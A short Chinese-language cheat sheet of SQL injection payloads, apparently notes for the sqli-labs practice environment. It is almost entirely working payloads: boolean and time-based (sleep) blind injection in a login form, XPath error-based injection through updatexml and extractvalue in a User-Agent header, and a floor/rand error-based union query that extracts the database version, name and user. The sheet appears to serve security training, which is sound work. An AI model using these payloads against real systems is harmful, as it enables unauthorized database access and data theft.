红色为payload
1.布尔型盲注(select语句盲注)
uname=xxxxxx' or (length(database())=8)--+&passwd=xxxxx&submit=Submit
2.时间盲注(select语句盲注)
uname=xxxxx' or (select if(length(database())>1,sleep(3),1))--+&passwd=xxxxx&submit=Submit
这里面sleep3秒后面的1代表真。
3.报错盲注(insert语句盲注)
xpath报错盲注
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '1'='1
extractvalue 用法
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0' or extractvalue(1,concat(0x7e,database())) or '1'='1
floor报错
http://192.168.1.63/sqli-labs/Less-5/?id= 0' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2)) x from information_schema.tables group by x) qkill --+
